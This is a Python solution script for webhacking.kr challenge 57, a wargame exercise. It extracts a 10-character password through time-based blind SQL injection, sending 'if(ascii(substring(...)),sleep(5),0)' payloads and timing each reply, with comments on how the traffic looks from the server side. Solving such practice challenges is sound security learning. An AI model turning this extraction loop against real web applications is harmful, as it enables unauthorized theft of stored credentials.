if문+sleep을 이용한 blind sql injection
# webhacking.kr challenge 57: time-based blind SQL injection exercise.
#
# The script learns a 10-character `pw` value one character at a time by
# asking the database to sleep when a guess is right and timing the reply.
# Seen from the server side, this traffic is a long burst of GET requests
# from one session whose `se` parameter carries `if(`, `substring(` and
# `sleep(`, with a few replies taking roughly five seconds.
# NOTE(review): the probe can only work if the server places `se` into a SQL
# statement without parameter binding -- presumably the case for this lab.
import http.client
import time
import string

# A single connection object is shared by every probe.
con = http.client.HTTPConnection('webhacking.kr')


def sql(se):
    """Send one probe and report whether the reply was delayed.

    `se` is appended as-is (no URL encoding) to the `se` query parameter
    of the challenge page.

    Returns True when the full round trip took at least 4 seconds, which
    the caller treats as "the injected condition was true" (the probes ask
    for a 5 second sleep). Any other source of latency looks the same to
    this check, so a slow but unrelated reply would be recorded as a match.
    """
    headers = {
        'Host': 'webhacking.kr',
        'Upgrade-Insecure-Requests': 1,
        'Cookie': 'id=aaaa; PHPSESSID=ddddd',
    }
    started = time.time()
    con.request(
        'GET',
        '/challenge/web/web-34/index.php?msg=111&se=' + se,
        headers=headers,
    )
    # The body has to be read in full before the same connection can carry
    # the next request; the content itself is not used.
    con.getresponse().read()
    elapsed = time.time() - started
    return elapsed >= 4


# Length probe left disabled by the author; presumably how the length of 10
# used in the loop below was established.
# print(sql('if(length(pw)=10,sleep(5),0)'))

# Candidate alphabet: ASCII letters followed by the digits.
arr = string.ascii_letters + '1234567890'
pw = ''
for position in range(1, 11):
    for candidate in arr:
        probe = 'if(ascii(substring(pw,%d,1))=%d,sleep(5),0)' % (
            position,
            ord(candidate),
        )
        delayed = sql(probe)
        # print(probe)
        print(candidate)
        if not delayed:
            continue
        # A delayed reply marks this candidate as the character at `position`.
        pw += candidate
        print(pw)
        break
print(pw)